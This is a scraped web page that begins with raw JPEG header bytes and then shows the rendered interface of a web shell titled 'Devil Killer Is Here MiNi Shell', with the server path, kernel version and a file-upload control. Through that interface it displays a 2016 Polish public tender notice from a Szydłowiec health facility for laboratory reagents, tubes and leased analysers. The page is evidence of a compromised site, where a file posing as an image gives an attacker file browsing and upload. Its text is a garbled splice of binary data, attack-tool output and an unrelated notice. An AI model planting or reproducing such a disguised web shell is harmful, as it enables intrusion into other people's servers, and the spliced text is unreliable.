JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160215/33078-N-2016.html

<p class="kh_header"><b>Szydłowiec: Dostawa odczynników i probówek, dzierżawa czytnika do moczu, dzierżawa koagulometru oraz dzierżawa wirówki  dla potrzeb Laboratorium Analitycznego Samodzielnego Publicznego Zespołu  Zakładów Opieki Zdrowotnej  w Szydłowcu</b><br>
<b>Numer ogłoszenia: 33078 - 2016; data zamieszczenia: 15.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Szydłowcu , ul. Wschodnia 23, 26-500 Szydłowiec, woj. mazowieckie, tel. 048 6170300, faks 048 6170980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz.szydlowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników i probówek, dzierżawa czytnika do moczu, dzierżawa koagulometru oraz dzierżawa wirówki  dla potrzeb Laboratorium Analitycznego Samodzielnego Publicznego Zespołu  Zakładów Opieki Zdrowotnej  w Szydłowcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odczynników i probówek dla potrzeb Laboratorium Analitycznego Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Szydłowcu zgodnie z załącznikami numer 6, 6a, 6b, 6c, 6d, 6e, 6f, 6g oraz dzierżawa czytnika do moczu zał. nr 6b, dzierżawa analizatora koagulogicznego zał. nr 6a oraz dzierżawa wirówki - zał. 6f do SIWZ.

PRZEDMIOT ZAMÓWIENIA
Załącznik nr 6
Biochemia - Aparat KONELAB 20 + ISE	
1.BILIRUBINA TOT. MET. NBD. 1 op.(4 x 60 ml)	9 op.
2.CALCIUM ARSENAZO III 1 op.(8 x 20 ml)	6 op.
3.TOTAL PROTEIN PLUS 1op.(12 x 20 ml)	6 op.
4.ENZYLINE ALFA AMYLASE 1 op.(16 x 5 ml)	9 op.
5.CREATYNINE ENZYMATIC 1 op.(4 x 60 ml)	12 op.
6.HDL CHOLESTEROL 1op. (4 x 80 ml)	6 op.
7.HDL:LDL CALIBRATOR 1op.( 5 x 1 ml)	3 op.
8.GLUCOSE GOD - POD 1 op.(10 x 60 ml)	12 op.
9.CHOLESTEROL LIQ 1 op.(10 x 60 ml)	12 op.
10.WASHFLUID 1 op.(8 x 20 ml)	9 op.
11.TRIGLYCERIDES 1 op.(12 x 20 ml)	15 op.
12.UREA1 op.( 12 x 20 ml)	9 op.
13.URIC ACID (AOX) 1op.( 8 x 20 ml)	6 op.
14.ASPAT:GOT (IFCC) 1 op.(8 x 20 ml)	12 op.
15.ALAT:GPT (IFCC) 1op. (8 x 20 ml)	12 op.
16.ALP (IFCC) 1 op.(15 x 5 ml)	9 op.
17.MAGNESIUM XYLIDUL BLUE 1op. (8 x 10 ml)	9 op.
18.PHOSPHORES 1 op.(12 x 20 ml)	6 op.
19.IRON FERENE 1 op. (10 x 20 ml)	6 op.
20.NORTROL CONTROL SERUM 1 op.(10 x 5 ml)	9 op.
21.ABTROL CONTROL SERUM 1 op.(10 x 5 ml)	9 op.
22.s - Cal 1 op.(10 x 3 ml)	6 op.
23.e - Cal 1op.(5 x 3 ml)	6 op.
24.KONELAB WASHING SOLUT. 1 op.( 4 x 20 ml)	6 op.
25.KONELAB ACRYLIC CUVETE (1 op. a 12 tys.)	18 op.
26.KONELAB  6M. KIT	3 op.
27.KONELAB 20  12 M. KIT	3 op.
28.NACZYNKA 0,5 ml  a 1000 szt.	15 op.
29.CK 1 op.(2x25  ml)	3 op.
30.GGTP 1 op.(15 x 5 ml)	6 op.
31.CRP KONE  1 op.(1 x 3 ml)	3 op.
32.CONTROL N CRP 1 op.(5 x 1 ml)	2 op.
33.CONTROL P CRP 1 op.(5 x 1 ml)	2 op.
34.Calibrator CRP 1op. (5x1 ml.)	2 op.
35.Odczynnik do modułu ISE 1 op.(4 x 400 ml)	15 op.
36.ISE Calibrtor 2 i 3 1 op.(4 x 20 ml) 	2 op.
37.Na - elektrode (do KONELAB 20 ISE)	2 szt.
38.K - elektrode (do KONELAB 20 ISE)	2 szt.
39.Elektroda referencyjna  	1 szt.
40.REF elektrode solution  	2 op.
41.KONELAB  20 ISE 6M. KIT	3 op.
42.KONELAB 20  ISE 12 M. KIT	3 op.
43.H.pylorii Ag w kale	3 op.
Załącznik nr 6a
Dzierżawa  aparatu + odczynniki do badań koagulogicznych:
I Dzierżawa analizatora koagulogicznego: Tak - podać nazwę handlową, model oraz producenta
1.Gwarancja  36 miesiące	Wymagane
2.4 kanały pomiaru 	Wymagane 
3.Duży  dotykowy wyświetlacz	Wymagane 
4.Wprowadzenia aplikacji odczynnikowej za pomocą kodów kreskowych	Wymagane 
5.Oprogramowanie w języku polskim	Wymagane
6.Aparat rok produkcji (min. 2015)	Wymagane
II   Odczynniki do badań koagulogicznych
1.Odczynnik do oznaczania czasu protrombinowego 1 op. - (12 x 4 ml) (1 op. - max. 48 ml.) 40 op. (1920 ml.)
2.Odczynnik do oznaczania APTT 1 op.  - (max 24 ml) - 12 x2ml	8 op. (192 ml)
3. Surowica kontrolna - zakres normalny 1 op. - (10 x 1 ml)	10 op.(100 ml.)
4. Surowica kontrolna - zakres patologiczny  1 op. - (10 x 1 ml)	10 op.(100 ml.)
5. Kuwety pomiarowe oferowanego analizatora 500 szt. 40 op.
Załącznik nr 6 b
Dzierżawa  czytnika do moczu + zakup pasków
I  Czytnik do moczu: (z wyświetlaczem i wbudowaną drukarką, z możliwością przechowywania do 1000 -ca  wyników badań 	
1 Podajnik pasków w ruchu ciągłym 	Wymagane 
2 Pojemnik na zużyte paski w aparacie	Wymagane 
3 Aparat fabrycznie  nowy,  rok produkcji  min 2015 r. 	Wymagane 
4 Paski i aparat tego samego producenta - dostawcy	Wymagane 
5 Automatyczna kalibracja i prosta obsługa	Wymagane
II   Paski do badania  moczu	
1 Paski do moczu min 11 parametrów  (pole do kwasu askorbinowego) 1 op. a 100 szt. 	600 op.
2 Paski powinny posiadać certyfikat CE.	Wymagane
3 Mocz kontrolny patologiczny ciekły 4 x 15 ml stabilny 30 dni po otwarciu.	20 op.
4 Mocz kontrolny normalny ciekły 4 x 15 ml stabilny 30 dni po otwarciu.	20 op.
Załącznik nr 6c
Probówki i  inny drobny sprzęt laborat.	
1.Probówki do badań hematologicznych z EDTA-K2 z korkiem zwykłym i nalepką  na 1 ml. 12x 75 mm	5 000 szt.
2. Probówki do badań hematologicznych z EDTA-K2 z korkiem zwykłym   i nalepką  na 2 ml. 12x 75 mm	10 000 Szt.
3.Probówki do koagulogii  na 1,8 ml krwi z nalepką 12 x 75 mm 9 000 szt.
4.Zestaw do oznaczenia OB. (próbówka na 1,6 ml krwi z nalepką + rurka z podziałką	10 000 szt.
5.Statyw do nastawiania OB  (10 miejscowy)	6 szt.
6.Probówki o poj.  11ml  z korkiem i granulatem do szybkiego wykrzepiania krwi i seperacji surowicy o wysokim stopniu przejrzystości (z medoplast , polistyrenowe lub równoważne, równoważność ma polegać na takiej samej wysokiej przeźroczystości)   16 x 100 ml - z ofertą należy dołączyć wzór probówek.	15 000 Szt.
7. Probówki okrągłodenne, 12-13x100 mm przejrzyste  (z medoplast , polistyrenowe lub równoważne, równoważność ma polegać na takiej samej wysokiej przeźroczystości) -  prosimy o wzór. 2000 Szt.
8. Probówki Ependorfa a 500 ml	2000 szt.
9.Płyty z tworzywa przeźroczystego do oznaczania grupy krwi 5x7 (1 op a 100) 5 op.
10.Końcówki do pipet automatycznych żółte  200 ul  1 op. a 1000 szt	20 op.
11.Końcówki do pipet automatycznych niebieskie  1000 ul 1 op. a 1000szt	15 op.
12.Szkiełka nakrywkowe (24 x 24) a 1000 szt.	20 op.
13.Szkiełka podstawowe - mikroskopowe 75x25mm, grubość 1mm ciętymi krawędziami bez pola do opisu (1 op. a 50 szt.) 	50 op.
14.Mazaki do pisania po szkle (niebieskie),  (1 op. a 12 szt.)	8 op.
15.Pipeta automatyczna ustawna 1 - 50 ul	2 szt.
16.Pipeta automatyczna 50 ul	2 szt.
17.Pipeta automatyczna 200 ul 3 szt.
Załącznik nr 6d
1.Test do wykrywania krwi utajonej w kale (bez diety), (1 op a 25) testów	8 op.
2.Test na lamblie met EIA ( 1 op. a 96)	4 op.
3.ASO  + kontrole (1op. a 100)	4 op.
4.Odczyn Walera  Rosego + kontrole a 100	4 op.
5.CPR + kontrole (a 100 ozn a 1 op.)	10 op.
6.WR + kontrole a 100 	3 op.
7.RF + kontrole  a 100	6 op.
8.Testy do wykrywania narkotyków w moczu (5 parowe a 10 szt. w 1 op.)	4 op.
Załącznik nr 6e
1.Odczynnik May - Grunwalda a 1 l	15 l.
2.Odczynnik Giemsy 1 op. 1 l	15 l.
3.Płyn Lugola a 1 l	5 l.
4.Odczynnik Extona a 1 l	5 l.
Załącznik nr 6f
Oznaczanie przeciwciał mikrometodą żelową wraz z dzierżawą wirówki	
I Dzierżawa wirówki	
Wymagania	 
1. Badanie przeglądowe przeciwciał pośrednim testem antyglobulinowym na 3 krwinkach wzorcowych, włączając antygen Cw - zgodnie z obowiązującymi przepisami. Mikrokarty wypełnione surowicą anyglobulinową poliwalentną.	Wymagane 
2. Metodyka eliminująca płukanie krwinek czerwonych - zawiesina krwinek czerwonych poniżej 1%.	Wymagane 
3. Wymagane jest, aby odczynniki były gotowe do użycia (krwinki wzorcowe zawieszone w odczynniku o niskiej sile jonowej - poniżej 1 procent, a karty składały się z 6 mikrokolumn  i były wypełnione nieprzelewającym podłożem separującym. Surowice wzorcowe do oznaczeń  PTA naniesione na kolumienki przez producenta.	Wymagane 
4. Wymagane są dostawy odczynników krwinkowych transportem monitorowanym pod względem temperatury  w czasie transportu (2-8 st. C), a przykładowy wydruk  ze wskazaniami temperatury z wykonanych dostaw musi stanowić załącznik do oferty.	Wymagane 
5. Przechowywanie wszystkich mikrokart w temp. pokojowej (18-25 st. C).	Wymagane
6. Termin ważności odczynników - minimum 9 miesięcy od daty dostawy, odczynników krwinkowych - 5 tygodni.	Wymagane
7. Wirówka do mikrokart na 6 - 10 miejsc - 1 szt. Stała prędkość   i czas wirowania. Nowa lub używana, z wyjmowanym rotorem bez użycia narzędzi dla ułatwienia dezynfekcji.	Wymagane
8. Nieelektroniczna (manualna) pipeta multidozująca dedykowana do systemu - 1 szt. Nowa lub używana.	Wymagane
9. Instalacja i przeprowadzenie szkolenia personelu użytkownika  w siedzibie zamawiającego, potwierdzanego stosownym certyfikatem.	Wymagane
10. Załączyć do oferty certyfikaty CE oferowanych wyrobów medycznych.	Wymagane
11. Dołączenie polskojęzycznej instrukcji obsługi aparatury i techniki wykonywanych badań.	Wymagane
12. Do oferty zamawiający wymaga załączenia pozytywnej opinii Instytutu Hematologii i Transfuzjologii w Warszawie o oferowanych testach mikrokolumnowych (zgodnie z obowiązującymi przepisami IHiT Medyczne zasady rozdz. 7 punkt 7.5, wyd III), który na podstawie ustawy z dnia 22.08.1997 r. o publicznej służby krwi (Dz. U. Nr 106, poz. 681, z późn. zm.) stanowi w Polsce obowiązujące przepisy w jednostkach organizacyjnych publicznej służby krwi.	Wymagane
13. Do oferty zamawiający wymaga załączenia pozytywnej opinii Instytutu Hematologii i Transfuzjologii w Warszawie o oferowanych testach mikrokolumnowych (zgodnie z obowiązującymi przepisami IHiT Medyczne zasady rozdz. 7 punkt 7.5, wyd III), który na podstawie ustawy z dnia 22.08.1997 r. o publicznej służby krwi (Dz. U. Nr 106, poz. 681, z późn. zm.) stanowi w Polsce obowiązujące przepisy w jednostkach organizacyjnych publicznej służby krwi.	Wymagane
14. Nakłuwacze do pobierania krwi z drenów posiadały kaptur umożliwiający nałożenie nakłuwacza na probówkę, która zapobiega jednocześnie rozpryskiwaniu krwi przy nakłuwaniu drenów.	Wymagane
II   Oznaczanie przeciwciał mikrometodą żelową	
1. Zestaw trzech krwinek do badania przeglądowego przeciwciał. Krwinki wzorcowe o stężeniu poniżej 1% gotowe do użycia.	36 op.
2. Badanie przeglądowe przeciwciał w PTA:LISS na trzech krwinkach wzorcowych włączając antygen Cw.	2000 badań
3. Pipeta multidozująca	1 szt.
4. Końcówki do pipety	2000 szt.
Załącznik 6e
I Oznaczanie grup krwi metodą manualną	
1.Krwinki wzorcowe do układu ABO gotowe do użycia  1 op. (3 x 4ml)	36 op.
2.Odczynniki monoklonalny anty A seria I - 1 op. 5 x 10 ml	12 op.
3.Odczynniki monoklonalny anty A seria II - 1 op. 5 x 10 ml	12 op.
4.Odczynniki monoklonalny anty B seria I - 1 op. 5 x 10 ml	12 op.
5.Odczynniki monoklonalny anty B seria II - 1 op. 5 x 10 ml	12 op.
6.Odczynniki monoklonalny anty RUM - 1 op. 5 x 10 ml	18 op.
7.Odczynniki monoklonalny anty D Blend - 1 op. 5 x 10 ml	18 op..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.70.00-7, 33.19.25.00-7, 33.14.13.20-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków Wykonawca składa wraz z ofertą oświadczenie o spełnieniu warunków o których mowa w art. 22 i 24 Prawo zamówień publicznych (wzór oświadczenia stanowi zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia wymagań.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 131e ust. 1 pkt. 2 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień umowy w odniesieniu do:
1.Waloryzacja wynagrodzenia:
Strony postanawiają, iż dokonują w formie pisemnego aneksu zmiany wynagrodzenia w wypadku wystąpienia którejkolwiek ze zmian przepisów wskazanych w art. 142 ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, tj. zmiany:
a.stawki podatku od towarów i usług,
b.wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
c.zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.
2.	Zmiany wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian o których mowa w ust. 1.
3.W wypadku zmiany, o której mowa w ust. 1 lit. a) wartość netto wynagrodzenia Wykonawcy nie zmieni się , a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.
4.W przypadku zmiany, o której mowa w ust. 1 lit b) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie                do wysokości zmienionego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia.
5.W przypadku zmiany, o której mowa w ust. 1 lit c) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego.
